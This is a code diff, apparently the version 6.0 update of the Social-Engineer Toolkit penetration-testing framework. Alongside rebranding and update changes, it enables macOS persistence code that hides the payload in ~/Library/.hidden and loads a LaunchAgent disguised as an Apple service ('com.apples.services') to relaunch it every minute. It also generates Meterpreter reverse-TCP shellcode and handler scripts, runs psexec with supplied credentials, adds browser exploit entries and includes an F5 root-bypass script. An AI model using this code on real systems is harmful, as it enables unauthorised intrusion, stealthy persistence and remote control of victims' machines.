+'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
 'Adobe Flash Player "Button" Remote Code Execution',
@@ -327,6 +329,8 @@ create_payloads_text = """
            ********** PAYLOADS **********\n"""
 
 browser_exploits_menu = [
+'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
+'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
 'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
 'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
 'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',

src/core/payloadprep.py

@@ -170,57 +170,56 @@ if posix == True:
     filewrite.write(downloader + "\n")
     persistence = check_config("ENABLE_PERSISTENCE_OSX=").lower()
     if persistence == "on":
-        print "Coming soon.."
         # modified persistence osx from http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
-        #filewrite.write(r"mkdir ~/Library/.hidden")
-        #filewrite.write("\n")
-        #filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
-        #filewrite.write("\n")
-        #filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" % (osx_name, payload_flags[1], payload_flags[2]))
-        #filewrite.write("\n")
-        #filewrite.write(r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
-        #filewrite.write("\n")
-        #filewrite.write(r"mkdir ~/Library/LaunchAgents")
-        #filewrite.write("\n")
-        #filewrite.write("echo '<plist version=\"1.0\">' > ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<key>Label</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<string>com.apples.services</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<key>ProgramArguments</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<string>/bin/sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write("echo '<string>'$HOME'/Library/.hidden/connect.sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '</array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<key>RunAtLoad</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<key>StartInterval</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<integer>60</integer>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<key>AbandonProcessGroup</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '</dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"echo '</plist>' >> ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
-        #filewrite.write("\n")
-        #filewrite.write(r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write(r"mkdir ~/Library/.hidden")
+        filewrite.write("\n")
+        filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
+        filewrite.write("\n")
+        filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
+        filewrite.write("\n")
+        filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" % (osx_name, payload_flags[1], payload_flags[2]))
+        filewrite.write("\n")
+        filewrite.write(r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
+        filewrite.write("\n")
+        filewrite.write(r"mkdir ~/Library/LaunchAgents")
+        filewrite.write("\n")
+        filewrite.write("echo '<plist version=\"1.0\">' > ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<key>Label</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<string>com.apples.services</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<key>ProgramArguments</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<string>/bin/sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write("echo '<string>'$HOME'/Library/.hidden/connect.sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '</array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<key>RunAtLoad</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<key>StartInterval</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<integer>60</integer>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<key>AbandonProcessGroup</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '</dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"echo '</plist>' >> ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
+        filewrite.write("\n")
+        filewrite.write(r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
 
     filewrite.close()
     # grab nix binary name

src/core/reports/index.html

@@ -1,37 +1,28 @@
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
 
-<title>SecManiac.com - The home of David Kennedy (ReL1K)</title>
+<title>TrustedSec.com - Information Security Made Simple</title>
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 <meta http-equiv="X-UA-Compatible" content="IE=100"> <!-- Force IE8 Compatibility mode OFF -->
 
-<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
-<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="http://www.secmaniac.com/wp-content/themes/SecManiac2010/favicon.ico">
 <link rel="stylesheet" href="files/style.css" type="text/css">
-<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.secmaniac.com/feed/">
-<link rel="alternate" type="text/xml" title="RSS .92" href="http://www.secmaniac.com/feed/rss/">
-<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://www.secmaniac.com/feed/atom/">
-<link rel="pingback" href="http://www.secmaniac.com/xmlrpc.php">
-
-
-
-	
-<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Feed" href="http://www.secmaniac.com/feed/">
-<link rel="alternate" type="application/rss+xml" title="SecManiac.com » Comments Feed" href="http://www.secmaniac.com/comments/feed/">
-
-
+<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.trustedsec.com/feed/">
+<link rel="alternate" type="text/xml" title="RSS .92" href="http://www.trustedsec.com/feed/rss/">
+<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://www.trustedsec.com/feed/atom/">
+<link rel="alternate" type="application/rss+xml" title="TrustedSec.com » Feed" href="http://www.trustedsec.com/feed/">
+<link rel="alternate" type="application/rss+xml" title="TrustedSec.com » Comments Feed" href="http://www.trustedsec.com/comments/feed/">
 
 </head><body>
 
 	<div id="header">
 	
 	<div id="socialmedia2">
-		<a href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
+		<a href="http://www.trustedsec.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
 		<a href="http://twitter.com/hackingdave"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
 	</div>
 	
 		<div id="logo">
-		<a href="http://www.secmaniac.com/"><img src="files/logo.png" alt="SecManiac.com"></a>
+		<a href="http://www.trustedsec.com/"><img src="files/logo.png" alt="TrustedSec.com"></a>
 		</div>
 		
 	
@@ -41,7 +32,7 @@
 
 	
 		<div id="content">
-		<h1><a href="http://www.secmaniac.com/">The Social-Engineer Toolkit (SET) Report Generator</a></h1>
+		<h1><a href="http://www.trustedsec.com/">The Social-Engineer Toolkit (SET) Report Generator</a></h1>
 			
 		<div class="post">
 		<h4 class="dates">Social-Engineer Toolkit (SET) report on REPLACEHEREDUDE</h4>
@@ -81,39 +72,13 @@ The credential harvester keeps track of how many individuals visited a site and
 	<div id="footer">
 		<center><span style="color: rgb(102, 102, 102);">Visit us on</span> <span style="color: rgb(70, 141, 171);">irc.freenode.net</span> <span style="color: rgb(102, 102, 102);">#backtrack-linux or #social-engineer</span></center>
 		<div id="copyright">
-		<center><a href="http://www.secmaniac.com/">© SecManiac.com All rights reserved.</a> | <a href="http://www.ticktockcomputers.com/" target="_blank">Designs by Digip</a></center>
+		<center><a href="http://www.trustedsec.com/">© TrustedSec.com All rights reserved.</a> | <a href="http://www.ticktockcomputers.com/" target="_blank">Designs by Digip</a></center>
 		</div>
 	
 	</div>
 
-		
-
 	<div id="socialmedia">
-		<a href="http://www.secmaniac.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
+		<a href="http://www.trustedsec.com/feed/"><img src="files/rss.png" alt="RSS Feed" title="RSS Feed"></a><br><br>
 		<a href="http://twitter.com/hackingdave"><img src="files/tweet.png" alt="Twitter" title="Follow Me On Twitter!"></a>
 	</div>
 	
-<script type="text/javascript">
-var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
-document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
-</script><script src="18345832_data/ga_002.js" type="text/javascript"></script><script src="18345832_data/ga.js" type="text/javascript"></script>
-<script type="text/javascript">
-try {
-var pageTracker = _gat._getTracker("UA-12517663-3");
-pageTracker._setDomainName(".secmaniac.com");
-pageTracker._trackPageview();
-} catch(err) {}</script>
-
-<script type="text/javascript">
-var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
-document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
-</script><script src="18345832_data/ga_002.js" type="text/javascript"></script><script src="18345832_data/ga.js" type="text/javascript"></script>
-<script type="text/javascript">
-try {
-var pageTracker = _gat._getTracker("UA-12517663-4");
-pageTracker._trackPageview();
-} catch(err) {}</script>
-	
-<!-- Dynamic page generated in 0.169 seconds. -->
-<!-- Cached page generated by WP-Super-Cache on 2011-01-10 13:42:40 -->
-<!-- super cache --></body></html>

src/core/set.py

@@ -136,14 +136,19 @@ try:
                         return_continue()
                         break
 
-                # Web Attack menu choice 9: Create or Import a CodeSigning Certificate
-                if attack_vector == '8':
-                    sys.path.append("src/html/unsigned")
-                    debug_msg(me, "importing 'src.html.unsigned.verified_sign'", 1)
+                # full screen attack vector
+                if attack_vector == '7':
+                    # dont need site cloner
+                    site_cloned = False
+                    # skip nat section and exit out
+                    choice3 = "-1"
+                    sys.path.append("src/webattack/fsattack")
+                    debug_msg(me, "importing 'src.webattack.fsaattack'", 1)
                     try:
-                        reload(verified_sign)
+                        reload(full)
                     except:
-                        import verified_sign
+                        import full
+
                 # Web Attack menu choice 9: Return to the Previous Menu
                 if attack_vector == '99': break
 
@@ -164,7 +169,7 @@ try:
                     #     USER INPUT: SHOW WEB ATTACK VECTORS MENU    #
                     ###################################################
 
-                    if attack_vector != "8":
+                    if attack_vector != "7":
                         debug_msg(me, "printing 'text.webattack_vectors_menu'", 5)
                         show_webvectors_menu = create_menu(text.webattack_vectors_text, text.webattack_vectors_menu)
                         print '  99) Return to Webattack Menu\n'
@@ -312,15 +317,7 @@ try:
 
                         # if java applet attack
                         if attack_vector == "java":
-                            # Allow Self-Signed Certificates
-                            fileopen = file("config/set_config", "r").readlines()
-                            for line in fileopen:
-                                line = line.rstrip()
-                                match = re.search("SELF_SIGNED_APPLET=ON", line)
-                                if match:
-                                    sys.path.append("src/html/unsigned/")
-                                    debug_msg(me, "importing 'src.html.unsigned.self_sign'", 1)
-                                    import self_sign
+                            applet_choice()
 
                     # Select SET quick setup
                     if choice3 == '1':
@@ -351,14 +348,17 @@ try:
                             reload(arp)
                         except:
                             import arp
+
                         # actual website attack here
                         # web_server.py is main core
                         sys.path.append("src/html/")
+
                         # clean up stale file
                         if os.path.isfile(setdir + "/cloner.failed"):
                             os.remove(setdir + "/cloner.failed")
 
                         site_cloned = True
+
                         debug_msg(me, "line 375: importing 'src.webattack.web_clone.cloner'", 1)
                         try: reload(src.webattack.web_clone.cloner)
                         except: import src.webattack.web_clone.cloner

src/core/setcore.py

@@ -229,7 +229,7 @@ def print_error(message):
     print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
 
 def get_version():
-    define_version = '5.4.8'
+    define_version = '6.0'
     return define_version
 
 class create_menu:
@@ -399,27 +399,67 @@ def cleanup_routine():
     except:
         pass
 
-#
-# Update Metasploit
-#
-def update_metasploit():
-    print_info("Updating the Metasploit Framework...Be patient.")
-    msf_path = meta_path()
-    svn_update = subprocess.Popen("cd %s/;svn update" % (msf_path), shell=True).wait()
-    print_status("Metasploit has successfully updated!")
-    return_continue()
+# quick check to see if we are running kali-linux
+def check_kali():
+    if os.path.isfile("/etc/apt/sources.list"):
+        kali = file("/etc/apt/sources.list", "r")
+        kalidata = kali.read()
+        if "kali" in kalidata:
+            return "Kali"
+        # if we aren't running kali
+        else: return "Non-Kali"
+    else:
+        print "[!] Not running a Debian variant.."
+        return "Non-Kali"
+
+# checking if we have bleeding-edge enabled for updates
+def bleeding_edge():
+    # first check if we are actually using Kali
+    kali = check_kali()
+    if kali == "Kali":
+        print_status("Checking to see if bleeding-edge repos are active.")
+        # check if we have the repos enabled first
+        fileopen = file("/etc/apt/sources.list", "r")
+        kalidata = fileopen.read()
+        if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
+            print_status("Bleeding edge already active..Moving on..")
+            subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
+            return True
+        else:
+            print_status("Adding Kali bleeding edge to sources.list for updates.")
+            # we need to add repo to kali file
+            # we will rewrite the entire apt in case not all repos are there
+            filewrite = file("/etc/apt/sources.list", "w")
+            filewrite.write("# kali repos installed by TARDIS\ndeb http://http.kali.org/kali kali main non-free contrib\ndeb-src http://http.kali.org/kali kali main non-free contrib\n## Security updates\ndeb http://security.kali.org/kali-security kali/updates main contrib non-free\ndeb http://repo.kali.org/kali kali-bleeding-edge main")
+            filewrite.close()
+            print_status("Updating Kali now...")
+            subprocess.Popen("apt-get update;apt-get upgrade -f -y --force-yes;apt-get dist-upgrade -f -y --force-yes;apt-get autoremove -f -y --force-yes", shell=True).wait()
+            return True
+
+    else:
+        print "[!] Kali was not detected. Not adding bleeding edge repos."
+        return False
 
 #
 # Update The Social-Engineer Toolkit
 #
 def update_set():
-    print_info("Updating the Social-Engineer Toolkit, be patient...")
-    print_info("Performing cleanup first...")
-    subprocess.Popen("git clean -fd", shell=True).wait()
-    print_info("[*] Updating... This could take a little bit...")
-    subprocess.Popen("git pull", shell=True).wait()
-    print_status("The updating has finished, returning to main menu..")
-    time.sleep(2)
+    kali = check_kali()
+    if kali == "Kali":
+        print_status("You are running Kali Linux which maintains SET updates.")
+        print_status("You can enable bleeding-edge repos for up-to-date SET.")
+        time.sleep(2)
+        bleeding_edge()
+
+    else:
+        peinr_info("Kali-Linux not detected, manually updating..")
+        print_info("Updating the Social-Engineer Toolkit, be patient...")
+        print_info("Performing cleanup first...")
+        subprocess.Popen("git clean -fd", shell=True).wait()
+        print_info("Updating... This could take a little bit...")
+        subprocess.Popen("git pull", shell=True).wait()
+        print_status("The updating has finished, returning to main menu..")
+        time.sleep(2)
 
 #
 # Pull the help menu here
@@ -752,8 +792,8 @@ def show_banner(define_version,graphic):
     print bcolors.BLUE + """
 [---]        The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""")         [---]
 [---]        Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""")         [---]
-[---]                Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+"""                    [---]
-[---]              Codename: '""" + bcolors.YELLOW + """Walkers""" + bcolors.BLUE + """'                 [---]
+[---]                 Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+"""                     [---]
+[---]             Codename: '""" + bcolors.YELLOW + """Rebellion""" + bcolors.BLUE + """'                [---]
 [---]        Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+"""         [---]
 [---]        Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+"""        [---]
 [---]       Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+"""       [---]
@@ -765,7 +805,7 @@ def show_banner(define_version,graphic):
     print bcolors.BOLD + """   The Social-Engineer Toolkit is a product of TrustedSec.\n\n             Visit: """ + bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC
 
 def show_graphic():
-    menu = random.randrange(2,11)
+    menu = random.randrange(2,12)
     if menu == 2:
         print bcolors.YELLOW + r"""
                  .--.  .--. .-----.
@@ -898,6 +938,31 @@ def show_graphic():
                      
                 https://www.trustedsec.com""" + bcolors.ENDC
 
+    if menu == 11:
+        print bcolors.backBlue + r"""
+                          _                                           J
+                         /-\                                          J
+                    _____|#|_____                                     J
+                   |_____________|                                    J
+                  |_______________|                                   E
+                 ||_POLICE_##_BOX_||                                  R
+                 | |-|-|-|||-|-|-| |                                  O
+                 | |-|-|-|||-|-|-| |                                  N
+                 | |_|_|_|||_|_|_| |                                  I
+                 | ||~~~| | |---|| |                                  M
+                 | ||~~~|!|!| O || |                                  O
+                 | ||~~~| |.|___|| |                                  O
+                 | ||---| | |---|| |                                  O
+                 | ||   | | |   || |                                  O
+                 | ||___| | |___|| |                                  !
+                 | ||---| | |---|| |                                  !
+                 | ||   | | |   || |                                  !
+                 | ||___| | |___|| |                                  !
+                 |-----------------|                                  !
+                 |   Timey Wimey   |                                  !
+                 -------------------                                  !""" + bcolors.ENDC
+
+
 #
 # identify if set interactive shells are disabled
 #
@@ -921,7 +986,7 @@ def menu_back():
 def custom_template():
     try:
         print ("         [****]  Custom Template Generator [****]\n")
-        print ("Always looking for new templates! In the set/src/templates directory send an email\n   to davek@secmaniac.com if you got a good template!")
+        print ("Always looking for new templates! In the set/src/templates directory send an email\nto info@trustedsec.com if you got a good template!")
         author=raw_input(setprompt("0", "Enter the name of the author"))
         filename=randomgen=random.randrange(1,99999999999999999999)
         filename=str(filename)+(".template")
@@ -1190,12 +1255,13 @@ def generate_shellcode(payload,ipaddr,port):
     msf_path = meta_path()
     # generate payload
     port = port.replace("LPORT=", "")
-    proc = subprocess.Popen("%s/msfvenom -p %s LHOST=%s LPORT=%s c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
+    proc = subprocess.Popen("%s/msfvenom -p %s LHOST=%s LPORT=%s -a x86 --platform windows -f c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
     data = proc.communicate()[0]
     # start to format this a bit to get it ready
-    repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'buf=' : ''}
+    repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}
     data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
     # return data
+    print data
     return data
 
 # this will take input for shellcode and do a replace for IP addresses
@@ -1517,3 +1583,79 @@ def capture(func, *args, **kwargs):
     sys.stdout = stdout
     sys.stderr = stderr
     return (result, c1.getvalue(), c2.getvalue())
+
+
+def check_kali():
+    if os.path.isfile("/etc/apt/sources.list"):
+        kali = file("/etc/apt/sources.list", "r")
+        kalidata = kali.read()
+        if "kali" in kalidata:
+            return "Kali"
+        # if we aren't running kali
+        else: return "Non-Kali"
+    else:
+        print "[!] Not running a Debian variant.."
+        return "Non-Kali"
+
+# checking if we have bleeding-edge enabled for updates
+def bleeding_edge():
+    # first check if we are actually using Kali
+    kali = check_kali()
+    if kali == "Kali":
+        print "[*] Checking to see if bleeding-edge repos are active."
+        # check if we have the repos enabled first
+        fileopen = file("/etc/apt/sources.list", "r")
+        kalidata = fileopen.read()
+        if "deb http://repo.kali.org/kali kali-bleeding-edge main" in kalidata:
+            print "[*] Bleeding edge already active..Moving on.."
+            return True
+        else:
+            print "[!] Bleeding edge repos were not detected. This is recommended."
+            enable = raw_input("Do you want to enable bleeding-edge repos for fast updates [yes/no]: ")
+            if enable == "y" or enable == "yes":
+                print "[*] Adding Kali bleeding edge to sources.list for updates."
+                # we need to add repo to kali file
+                # we will rewrite the entire apt in case not all repos are there
+                filewrite = file("/etc/apt/sources.list", "w")
+                filewrite.write("# kali repos installed by TARDIS\ndeb http://http.kali.org/kali kali main non-free contrib\ndeb-src http://http.kali.org/kali kali main non-free contrib\n## Security updates\ndeb http://security.kali.org/kali-security kali/updates main contrib non-free\ndeb http://repo.kali.org/kali kali-bleeding-edge main")
+                filewrite.close()
+                print "[*] It is recommended to now run apt-get update && apt-get upgrade && apt-get dist-upgrade && apt-get autoremove and restart SET."
+                return True
+            else:
+                print "[:(] Your loss! Bleeding edge provides updates regularly to Metasploit, SET, and others!"
+
+# here we give multiple options to specify for SET java applet
+def applet_choice():
+    
+    # prompt here 
+    print """
+[-------------------------------------------]
+Java Applet Configuration Options Below
+[-------------------------------------------]
+
+Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
+
+Select which option you want:
+
+1. Make my own self-signed certificate applet.
+2. Use the applet built into SET.
+3. I have my own code signing certificate or applet.\n"""
+
+    choice1 = raw_input("Enter the number you want to use [1-3]: ")
+
+    # use the default
+    if choice1 == "": choice1 = "2"
+
+    # make our own
+    if choice1 == "1":
+        try: import src.html.unsigned.self_sign
+        except: reload(src.html.unsigned.self_sign)
+
+    # if we need to use the built in applet
+    if choice1 == "2":
+        print_status("Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(")
+
+    # if we want to build our own
+    if choice1 == "3":
+        try: import src.html.unsigned.verified_sign
+        except: reload(src.html.unsigned.verified_sign)

src/fasttrack/delldrac.py

@@ -65,7 +65,7 @@ print "Fast-Track DellDRAC and Dell Chassis Discovery and Brute Forcer"
 print ""
 print "Written by Dave Kennedy @ TrustedSec"
 print "https://www.trustedsec.com"
-print "@TrustedSec and @dave_rel1k"
+print "@TrustedSec and @HackingDave"
 print "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
 print ""
 print "This attack vector can be used to identify default installations"

src/fasttrack/exploits/f5.py

@@ -3,7 +3,7 @@
 # Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
 #
 # Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
-# http://www.secmaniac.com
+# http://www.trustedsec.com
 #
 #
 import subprocess,os
@@ -30,7 +30,7 @@ print """
 Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
 
 Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
-http://www.secmaniac.com
+http://www.trustedsec.com
 """
 ipaddr=raw_input("Enter the IP address of the F5: ")
 subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()

src/fasttrack/exploits/mysql_bypass.py

@@ -5,9 +5,10 @@
 #
 # Title: MySQL Remote Root Authentication Bypass
 # Written by: Dave Kennedy (ReL1K)
-# http://www.secmaniac.com
+# http://www.trustedsec.com
 #
 # Original advisory here: seclists.org/oss-sec/2012/q2/493
+#
 import subprocess
 
 print """
@@ -15,7 +16,7 @@ This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this
 
 Title: MySQL Remote Root Authentication Bypass
 Written by: Dave Kennedy (ReL1K)
-http://www.secmaniac.com
+http://www.trustedsec.com
 
 Original advisory here: seclists.org/oss-sec/2012/q2/493
 

src/fasttrack/mssql.py

@@ -123,9 +123,13 @@ def deploy_hex2binary(ipaddr,port,username,password):
         if not os.path.isfile(setdir + "/set.payload"):
             if operating_system == "posix":
                 web_path = (setdir)
-                subprocess.Popen("cp %s/msf.exe %s/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
-                subprocess.Popen("cp %s//msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
-        fileopen = file("%s/msf.exe" % (web_path), "rb")
+                # if it isn't there yet
+                if not os.path.isfile(setdir + "/1msf.exe"):
+                    # move it then
+                    subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % (setdir, setdir), shell=True).wait()
+                subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
+                subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
+        fileopen = file("%s/1msf.exe" % (web_path), "rb")
         # read in the binary
         data = fileopen.read()
         # convert the binary to hex
@@ -163,6 +167,10 @@ def deploy_hex2binary(ipaddr,port,username,password):
         update_options("PORT=" + port)
         update_options("POWERSHELL_SOLO=ON")
         print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
+        filewrite = file(setdir + "/payload_options.shellcode", "w")
+        # format needed for shellcode generation
+        filewrite.write("windows/meterpreter/reverse_tcp" + " " + port + ",")
+        filewrite.close()
         try: reload(src.payloads.powershell.prep)
         except: import src.payloads.powershell.prep
         # create the directory if it does not exist

src/fasttrack/psexec.py

@@ -74,7 +74,7 @@ try:
 
     # write out our answer file for the powershell injection attack
     filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
-    filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" % (port,rhosts,username,password,domain,threads,command, stage_encoding))
+    filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" % (port,rhosts,username,password,domain,threads,command, stage_encoding))
     filewrite.close()
     msf_path = meta_path()
     # launch metasploit below

src/fasttrack/rid_enum.py

@@ -33,7 +33,7 @@ def usage():
 Written by: David Kennedy (ReL1K)
 Company: https://www.trustedsec.com
 Twitter: @TrustedSec
-Twitter: @Dave_ReL1K
+Twitter: @HackingDave
 
 Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
 null sessions and the SID to RID enum. If you specify a password file, it will

src/html/unsigned/verified_sign.py

@@ -3,7 +3,8 @@
 import subprocess
 import os
 import sys
-from src.core import setcore as core
+import shutil
+from src.core.setcore import *
 
 # keytool -import -storepass pw -alias MyCert -file mycert.spc
 # jarsigner -verbose -storepass <pw> -keypass <pw> unsigned.jar MyCert
@@ -32,97 +33,129 @@ print """
  prove the legitimacy of that certificate. That means you have to register a business with the state and everything else.
 
